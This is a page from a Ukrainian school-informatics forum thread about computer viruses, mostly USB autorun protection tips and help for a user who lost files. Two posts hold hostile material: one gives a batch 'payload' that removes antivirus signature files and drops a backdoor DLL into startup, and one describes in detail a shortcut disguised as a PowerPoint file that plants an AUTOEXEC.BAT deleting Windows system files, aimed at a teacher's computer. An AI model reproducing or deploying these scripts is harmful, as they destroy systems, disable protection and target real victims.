Пн, 23.10.2017, 07:18
Форум інформатиків України
Головна Реєстрація Вхід
Вітаю Вас, Гість · RSS
Вітання на форумі
Незнайомець
Вітаємо на форумі,
Незнайомцю!

   
зареєструйтесь
Перед реєстрацією обов’язково прочитайте:
Оновлення Учасники Пошук
Особисті повідомлення
Видавництво ’’Аспект’’ Видавництво

Сторінка 4 з 10«123456910»
Модератор форуму: НІКОЛЯ, Ktara, Bandalak, volevikt 
Форум інформатиків » РОЗДІЛ V: ПРОГРАМНЕ ЗАБЕЗПЕЧЕННЯ » 5.8 Антивірусні програми » Комп’ютерні віруси (Новини про комп’ютерні віруси, поділ знаннями про віруси.)
Комп’ютерні віруси
Ковальчук_Олександр Дата: Вт, 16.10.2007, 19:20 | Повідомлення № 1
Ветеран спілкування
Повідомлень: 3620
Нагороди: 17
Рейтинг: 192
Все, що знаєте про комп’ютерні віруси, залишайте в повідомленнях даної теми.

Шановні форумчани!!!!!
Повідомлення, які не відповідають темі або несуть некорисний зміст будуть видалятись без попередження!!!


Відредаговано: WWW - Пт, 06.06.2008, 02:24
Andrey123q Дата: Сб, 07.11.2009, 04:24 | Повідомлення № 46
Досвідчений учасник
Повідомлень: 1236
Нагороди: 3
Рейтинг: 84
Согласен, для рядового пользователя это слишком и в комп классе может легче мини программки. Но лично для меня этот способ с политиками и реестром есть оптимальным. Таких папок и файлов как правило немного, антивирус их не всегда все увидит, - мне не сложно открыть флешку и вручную несколькими нажатиями мышки это сделать. Предпочитаю доверять своим рукам, чем мини программкам, которые делают то же самое, и не всегда известно как и к каким последствиям может привести.
Quote (Махновець_Ігор)
у вас віруси не активуються, але на флешці вони будуть

их должен удалить антивирус. если не удалит антивирус, сомневаюсь что все удалит какая-либо программка

Quote (Махновець_Ігор)
це треба робити на кожному пк де ви використовуєте флешку то так можна й захекаться від прописування реєстрів!

не обязательно. даже если заразится, на мой ПК все-равно не проникнут.
а reg-файл? - запуск-настройка программки на каждом ПК быстрее?
Еще раз говорю: мне так удобно со своим ПК дома, никому ничего не навязываю. На работе флешки мы запретили.

Знаете, у меня просто некоторая такая аллергия выработалась к подобным программкам, которые пытаются что-то оптимизировать за меня, в то время как то же могу сделать я сам. Действие программок - от краха системы до повреждения Partition Table. Берусь за программки, только тогда когда не могу сделать что-то сам. Мне так удобно, пусть для вас это и глупо.
Ладно, щас какую-то программку посмотрю попробую ;)

Ковальчук_Олександр Дата: Сб, 07.11.2009, 04:37 | Повідомлення № 47
Ветеран спілкування
Повідомлень: 3620
Нагороди: 17
Рейтинг: 192
Як на мене, то і спосіб Andrey123q і спосіб використовувати програми додактові варті уваги.
Раніше, коли не знав про USB Disk Security і Зорький Глаз, забороняв автозапуск, а далі флешку відкривав тільки Total Commander, який завжди показує приховані файли і видаляв вручну авторановський файл і вірус(и). Як правило, після намагання видалити файл починав кричати Доктор Веб і допомагав мені це зробити. Тепер використовую обидві ці програми і дуже задоволений, оскільки це додатковий захист, який ні в якому разі лишнім не буває. Але як правило, сигналізують небезпеку і USB Disk Security Доктор Веб майже одночасно, тому інколи не знаю, на яку кнопку тиснути для видалення зарази. :)
P.S. Після видалення вірусів за допомогою цих програм всеодно заходжу в Total Commander і перевіряю візуально, чи точно видалили. Довіряти не можна нікому.
P.P.S. Як USB Disk Security так Зорький Глаз видаляють віруси тільки на поверхні флешки. Якщо є заражені ехе-шники в глибині флешки, то ці програми наврят чи допоможуть.
Andrey123q Дата: Сб, 07.11.2009, 05:34 | Повідомлення № 48
Досвідчений учасник
Повідомлень: 1236
Нагороди: 3
Рейтинг: 84
Попробовал USB Disk Security. В чем ее плюс? То что она тыкает мне пальцем, что вот мол файл autorun.inf найден или еще что там, что я сам не могу это увидеть?
Очистка реестра и диска - да нет спасибо, как-нибудь сам...
Показывает автозапуск в системе? - для этого пользуюсь элементарной прогой RegCleaner или средствами винды.

Вывод: спасибо не нужно мне таких программок. Раньше я относился к таким вопросам безопасности щепетильно, сейчас уже нет.

Чем плох способ создания reg-файла:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\Autorun.inf]
@="@SYS:DoesNotExist"
И никакая нечисть ко мне не проникнит, как бы я флешку не открывал. Зачем мне нужна эта лишняя прога на кампе. Для юзеров конечно самый раз. Буду советовать - спасибо %)

Додано (07.11.2009, 04:22)
---------------------------------------------
Источник: http://www.xakep.ru/magazine/xa/123/030/1.asp
----
Задача опять же та же — запретить вирусу создавать на флешке файл autorun.inf. Когда-то было достаточно просто создать каталог с именем AUTORUN. INF, выставив ему атрибуты «Read only» и «Hidden». Так мы препятствовали созданию файла с тем же именем. Сейчас это, понятно, не вариант. Зато есть чуть модифицированный трик, который большинство малвари обходить пока не научилось. Объясняю идею. Создаем каталог AUTORUN. INF. Если каталог не пустой, удалить его можно, лишь расправившись со всем содержимым. Это очень просто, — но только не в случае, когда в каталоге есть файлы с некоррект ными для FAT32 именами! Именно этот принцип защиты лежит в основе программы USB Disk Security (www.zbshareware.com), которая создает на флешке AUTORUN. INF и в нем файл «zhengbo.» (да-да, с точкой на конце — что, естественно, некорректно). И знаешь: большинство малвари остается не у дел. За свое «ноу-хау» разработчики просят $50, но нам ничего не стоит сделать то же самое вручную. Для этого вспоминаем старый трик из нашей давней статьи «Обход ограничений FAT32/NTFS» (http://www.xakep.ru/magazine/xA/062/080/5.asp), заключающийся в использовании локальных UNC-путей. Напомню, что UNC — это формат для записи пути к файлу, расположенному на удаленном компьютере. Он имеет вид \\server\share\path, где server — это название удаленного хоста. Такой способ доступа к файлам можно использовать и для локальной машины, — только тогда вместо server нужно подставлять «?» или «.», а путь к файлу указывать вместе с буквой диска. Например, так: \\?\C:\ folder\file.txt. Фишка в том, что при использовании UNC-путей и стандартных консольных команд можно создавать файлы даже с запрещенными файловой системой именами. Создадим несложный BAT-файл со следующим содержанием:

mkdir "\\?\J:\AUTORUN.INF\LPT3"

После запуска получим каталог с некорректным именем LPT3, находящийся в папке AUTORUN.INF — обычным способом ее уже не удалить, а значит, малварь не сможет создать файл autorun.inf, оставшись не у дел! Недостатков хватает и у этого способа. Во-первых, разработчики новой малвари могут использовать хинт от обратного и воспользоваться UNC-путями для удаления файлов/папок с некорректным именем: \\?\J:\AUTORUN.INF\LPT3. Директорию можно вообще не удалять — а беспрепятственно переименовать: к примеру, в AUTORUN.INF1. Другой вопрос, что такой малвари пока, опять же, немного. И раз мы заговорили о создании BAT-файла, то накидаем универсальный скриптик, который, помимо всего прочего, будет:

удалять папку, замаскированную под корзину (на флешке ее быть не должно), где располагают свои тела многие черви (в том числе, Downadup), а также папку с файлами восстановления системы;
создавать системную папку AUTORUN.INF с директорией COM1 ;
с удалением такого файла будут трудности даже под NTFS;
удалять и защищать desktop.ini, который также часто используется малварью.
rd /s /q %~d0\recycled
rd /s /q %~d0\recycler
rd /s /q «%~d0\System Volume Information"
del /f /q %~d0\autorun.*
mkdir "\\?\%~d0\autorun.inf\com1"
attrib +s +h %~d0\autorun.inf
del /f /q %~d0\desktop.ini
mkdir "\\?\%~d0\desktop.ini\com1"
attrib +s +h %~d0\desktop.ini

Достаточно сохранить это на флешке с именем, например, autorun.bat и запустить.
----

От себя. В нете на форумах встречал проблемку: антиавторан программы создают папки AUTORUN.INF в т.ч. на жестких дисках, которые не удаляются.
Вообщем удаляются они так же как и создаются, способом описанным в статье выше, именно для создания: mkdir "\\?\J:\AUTORUN.INF\LPT3" , значит для удаления: rd "\\?\N:\AUTORUN.INF\LPT3"
Логично так пробовать удалять файлы и папки на зараженных флешках, используя батник. Возьму способ на заметку. На флешке уже создал неудаляемый AUTORUN.INF. Нужно будет еще попробовать с правами доступа, но нужна NTFS. Вообщем заморозить флешку, чтоб туда вообще никакая нечисть не проникла. ;)
Мне интересней это делать самому чем программками.

Додано (07.11.2009, 04:34)
---------------------------------------------

Quote (Ковальчук_Олександр)
який завжди показує приховані файли

Хотя из Проводника тоже ведь видно (при выставленной опции показа скрытых файлов). Или Проводник может что-то и пропустить? - просто Тотал коммандером не пользуюсь...


Відредаговано: Andrey123q - Сб, 07.11.2009, 06:01
Ірина Дата: Сб, 07.11.2009, 13:02 | Повідомлення № 49
Профі в програмуванні та безпеці
Повідомлень: 140
Нагороди: 0
Рейтинг: 15
Quote (Andrey123q)
Логично так пробовать удалять файлы и папки на зараженных флешках, используя батник.

Не забывйте что батники можно использовать не только для защиты но и в обратном направлении что некоторые и делають.
Например коль вы затронули батники посмотрим наглядный пример для обезвреживание Касперского можно написать вот такой батник в виде боевой нагрузки

Код:
@echo off
attrib -R c:progra~1antivi~1 ackdoor.avc >nul
attrib -R c:progra~1antivi~1 rojan.avc >nul
del c:progra~1antivi~1 ackdoor.avc >nul
del c:progra~1antivi~1 rojan.avc >nul
copy c:progra~1antivi~1macro.avc c:progra~1antivi~1 ackdoor.avc >nul
copy c:progra~1antivi~1mail.avc c:progra~1antivi~1 rojan.avc >nul
c:windowspkunzip.exe -e -sBackdooR c:windowsASYSLG.DLL
C:WindowsГЛАВНО~1ПРОГРА~1АВТОЗА~1 >nul
del c:windowspkunzip.exe >nul
del c:windowsasyslg.dll >nul
del c:winstart.bat >nul
echo on
Хотя ДОС сейчас мало хто юзает в таких целях а зря. Но мысль хорошая попробуйте и опишите что получилось.

W-w-W Дата: Сб, 07.11.2009, 14:33 | Повідомлення № 50





Quote (Andrey123q)
Еще раз говорю: мне так удобно со своим ПК дома, никому ничего не навязываю.

та я й нічого до вас не маю, просто кожен розуміє це по своєму!

Quote (Andrey123q)
Мне так удобно, пусть для вас это и глупо.

це добре, що вам зручно, я не казав, що ваше бачення даної проблеми дурниця!
Andrey123q Дата: Сб, 07.11.2009, 15:05 | Повідомлення № 51
Досвідчений учасник
Повідомлень: 1236
Нагороди: 3
Рейтинг: 84
Quote (Махновець_Ігор)
це добре, що вам зручно, я не казав, що ваше бачення даної проблеми дурниця!

Сорри :)
НІКОЛЯ Дата: Пн, 11.02.2013, 14:08 | Повідомлення № 52
Знавець вірусів
Повідомлень: 2877
Нагороди: 17
Рейтинг: 201
РУБРИКА  ПИШУТЬ УЧНІ  B)

Здравствуйте, товарищи! Сегодня ночью делать было совершенно нефиг, ну и задумался: “а как можно сломать комп програмным способом, но так, чтобы это не сразу спалили?”. Я нашел ответ. Он находится в bat файлах.
План был таков:
СО СТОРОНЫ КЛАСУХИ И ОДНОКЛАССНИКОВ:
Я подхожу к компу, вставляю туда флеху, каспер(скорее всего) будет ругаца на файл autorun.inf, который автоматом копируеца на флеху с вирусованного компа класухи. Удаляем… Открываем флешку, там лежит файл Презентация.ppt. Это презентация MS Power Point, если кто не знает. Вот я щелкнул разок по этой презентации, экран моргнул пару раз, видимо павер пойнт загружаеца. Вот, йа показал свою презентацию, получил свою оценку, выдернул флеху, сел за свое место, а там дальше следующие люди показывают свои презентации. Вроде все нормально. Ну, када комп не нужен, класуха его вырубает, а патом включает, и обнаруживает то, что венда не грузица, или грузица но как то неправильно. Ребутит комп, и обнаруживает полное отсутствие венды на компе. ЧТО СЛУЧИЛОСЬ?!?!
Попробую объяснить. Разберем теперь и со стороны одноклассников(которые вапще ХЗ отом, что там на флехе хранится).
Вот я встаю с места по просьбе училки. Иду к столу, вставляю флеху в дополнительный слот USB в клаве. Комп опреледяет, что воткнуто что то похожее на флеху. Каспер(скорее всего) будет ругаца на файл autorun.inf, который автоматом копируеца на флеху с вирусованного компа класухи. Удаляем… Открываем флешку, там лежит файл Презентация.ppt. Это презентация MS Power Point, если кто не знает. На самом деле это не ppt файл. У нее на компе в параметрах “Свойства папки>Вид” стоит галочка на “Скрывать расширения для зарегистрированных типов файлов”. На самом деле этот файл имеет имя Презентация.ppt.lnk. Это, как вы поняли, ярлык. Но ярлык со значком от пауэр пойнта. Рядом со значком презентации есть папка test. Содержимое папки никто не знает. Файл Презентация.ppt.lnk запускает файл runner_copier.bat.
Файл runner_copier.bat совершает следующие действия:
-открывает файл pres.ppt с самой презентацией, которую йа должен показать
-копирует заранее написанный файл AUTOEXEC.BAT в C:.
Самое интересное заключается в павер пойнте. Так как он моргает перед полной готовностью, то многие, не зная, фчом прикол, могут не заметить моргнувшее окошко коммандной строки, которая, как раз и копирует заготовленный AUTOEXEC.BAT в заветный C:.
Теперь я расскажу, что находится в файле AUTOEXEC.BAT. Стандартный такой файл у меня имеет следующий вид:
goto %config%
:dos1
rem c:vc401vc
lh keyrus
lh mmouse
lh C:WINDOWSCOMMANDmscdex /d:12345678
lh dndn
bootgui=0
:dos2
rem essolo.com
lh keyrus
lh mmouse
lh dndn
bootgui=0
:win
rem c:essolo.com
set path=C:WINDOWS;C:WINDOWSCOMMAND;c:;c:windows;c:windowscomand;c:arc;c:dn
C:WINDOWSCOMMANDDELTREE /y C:WINDOWSTEMP*.*
mode con codepage prepare=((866) C:WINDOWSCOMMANDega3.cpi)
mode con codepage select=866
keyb ru,,C:WINDOWSCOMMANDkeybrd3.sys
goto continue
:meos
c:kolibrimeosload.com
:l:meosload.com
:continue
rem bootgui=1
Но я его немного подправил. Я всего лишь добавил в конец следующие строки:
cd
cd windows
del *.dll
del *.ini
cd system32
del *.dll
del *.exe
и все!
Действие самого вируса происходит следующим образом:
1)запускаеца файл Презентация.ppt.lnk
2)он ссылаеца на файл runner_copier.bat
3)файл runner_copier.bat заменяет файл AUTOEXEC.BAT, лежащий в C: на заранее заготовленый AUTOEXEC.BAT, который лежит на флехе в папке test.
4)дальше не происходит ничего. Пока включен комп, ничего не произойдет.
5) комп выключается
6) комп включаеца и при загруске венды загружается то, что описано в AUTOEXEC.BAT. Тут то и начинается самое интересное.
7) в этом батике указано следующее: загруска дров крысы, клавы, моника, и прочего.
8)как только загрузились драйвера, то этот батник дает задание венде самоудалица. Удаляюца файлы *.dll и *.exe из папок WINDOWS и system32.
9)скорее всего, комп не увидит никакой оси, т.к. больше половины файлов в папке WINDOWS и вовсех вложенных папках как раз дллки и екзешники.
end.
Если у кого есть идеи по изменению программы, пишите. НО! Программа должна удовлетворять таким критериям:
-малый размер
-незаметность
-неизвестность антивирям
-большие масштабы действия
-действие вируса осуществляется только после перезапуска компа(чтобы сразу не спалиться).
В остальном полная свобода.
Удачи в написании вирусов, товарищи!
mul44 Дата: Пн, 11.02.2013, 22:50 | Повідомлення № 53
Наполегливий учасник
Повідомлень: 942
Нагороди: 2
Рейтинг: 43
хм, я так понимаю привычка сидеть в винде под админом породила такие вот программы-вирусы :) , под гостем пробуйте, а то дали все права, а потом плачут что у них контакт увели

Відредаговано: mul44 - Пн, 11.02.2013, 22:50
NataliyG Дата: Пн, 13.10.2014, 12:49 | Повідомлення № 54
Активний учасник
Повідомлень: 680
Нагороди: 2
Рейтинг: 37
Історія така: Я працювала в інтернеті завантажувала рамочки для фотошопу. Одна не хотіла завантажуватися антивірус не пускав, ну я його тимчасово відключила. Потім знову включила проблем не виникло і антивірус не повідомив про жодного віруса. Флешка на цей час була в комп'ютері. Я ще трохи попрацювала тоді вимкнула комп і витягнула флешку. Сьогодні зранку відкриваю флешку, а вона порожня - тобто не  скриті файли а зовсім чиста як відформатована. Я включила ноутбук, а його диск D повнісю порожній 200 Гб чисті. Що таке? Я вперше з таким стикнулася, щкода інформації, але я як правило зберігала ще десь то частину відновлю, ще щось скачаю з інтернету. Питання як з таким боротися, я вже читала в Інтернеті кажуть є щось схоже, правде у мене так як би відформатував. Флешку пробувала на різник компах. Хто щось знає - допоможіть.
swetikccc Дата: Пн, 13.10.2014, 13:57 | Повідомлення № 55
Ветеран спілкування
Повідомлень: 3906
Нагороди: 25
Рейтинг: 355
1 Можливо вона не чиста, а створена папка яка імітує корінь і там знаходяться ваші файли.
В файлофому менеджері ії видно, здвинута позиція на 1 рівень вниз.
Краще завантажити пінгвіна з ДВД і подивитися
volodschool2 Дата: Пн, 13.10.2014, 16:00 | Повідомлення № 56
Досвідчений учасник
Повідомлень: 1361
Нагороди: 12
Рейтинг: 267
Цитата NataliyG ()
Одна не хотіла завантажуватися антивірус не пускав, ну я його тимчасово відключила.

Цитата NataliyG ()
Сьогодні зранку відкриваю флешку, а вона порожня - тобто не  скриті файли а зовсім чиста як відформатована. Я включила ноутбук, а його диск D повнісю порожній 200 Гб чисті.

А хоч рамочка фотошопівська залишилась? Адже заради неї Ви впустили ворога на свою територію!
NataliyG Дата: Пн, 13.10.2014, 16:57 | Повідомлення № 57
Активний учасник
Повідомлень: 680
Нагороди: 2
Рейтинг: 37
Цитата volodschool2 ()
А хоч рамочка фотошопівська залишилась? Адже заради неї Ви впустили ворога на свою територію!
Та ні! Та я розумію, що то моя вина. Мене хвилює інше, що зробити щоб цей вірус прибрати з мого комп'ютера? І як знати що він більше мені не нашкодить, я тут погуглила і виявляється є таке чудо яке дарують ВК, яке витирає інформацію періодично.
Чи достатньо почистити його антивірусом (у мене NOD) чи все ж треба форматувати увесь жорсткий диск і створювати наново файлову систему?

Додано (13.10.2014, 15:57)
---------------------------------------------
І чи є взагалі можливість відновити інформацію? Хоча б частково.

volodschool2 Дата: Пн, 13.10.2014, 17:15 | Повідомлення № 58
Досвідчений учасник
Повідомлень: 1361
Нагороди: 12
Рейтинг: 267
Цитата NataliyG ()
Я включила ноутбук, а його диск D повнісю порожній 200 Гб чисті

Спочатку треба переконатись, файли дійсно видалені, чи просто стали прихованими.
gu2in Дата: Пн, 13.10.2014, 18:22 | Повідомлення № 59
Досвідчений учасник
Повідомлень: 693
Нагороди: 7
Рейтинг: 239
Дійсно, спочатку необхідно точно визначити чи файли видалено чи приховано. Для цього скачайте Live CD/DVD/Flash і перегляньте вміст жорсткого диску чи флешки.

Якщо файли видалено, то їх можна відновити, якщо не відбувалося запису на ці диски. Гарантія відновлення 70-90%, як повезе.

Перевірте комп на віруси своїм НОД32, а потім іншим антивірусним сканером, наприклад Dr.Web CureIt: http://www.comss.ru/page.php?id=67

Перевірте автозапуск та планувальник, наприклад програмою Autoruns: http://rsload.net/soft/manager/8345-autoruns.html

Якщо файли видалено - то це скоріш за все (можу помилятись) старий жарт - bat-файл, упакований в оболонку exe з тихими ключами зміни атрибутів файлів та їх видаленням. Часто такі файли самознищуються після виконання роботи. Вікно командного рядка приховується, а тому користувач відразу нічого не помічає. Пишеться такий зловред за 1 хвилину + ще 1 хвилину упакувати його спеціальною програмою в exe-шку. Матеріал як це зробити Гуглиться на раз. Жарти від школярів.
NataliyG Дата: Пн, 13.10.2014, 19:29 | Повідомлення № 60
Активний учасник
Повідомлень: 680
Нагороди: 2
Рейтинг: 37
Дійсно, спочатку необхідно точно визначити чи файли видалено чи приховано. Для цього скачайте Live CD/DVD/Flash
Тотал командер нічого не побачив, а об'єм диску Віндовс показує що порожньо от я і зробила висновок, що видалено. Дякую зараз попробую.
Форум інформатиків » РОЗДІЛ V: ПРОГРАМНЕ ЗАБЕЗПЕЧЕННЯ » 5.8 Антивірусні програми » Комп’ютерні віруси (Новини про комп’ютерні віруси, поділ знаннями про віруси.)
Сторінка 4 з 10«123456910»
Пошук:


© Форум інформатиків України, 2007-2017.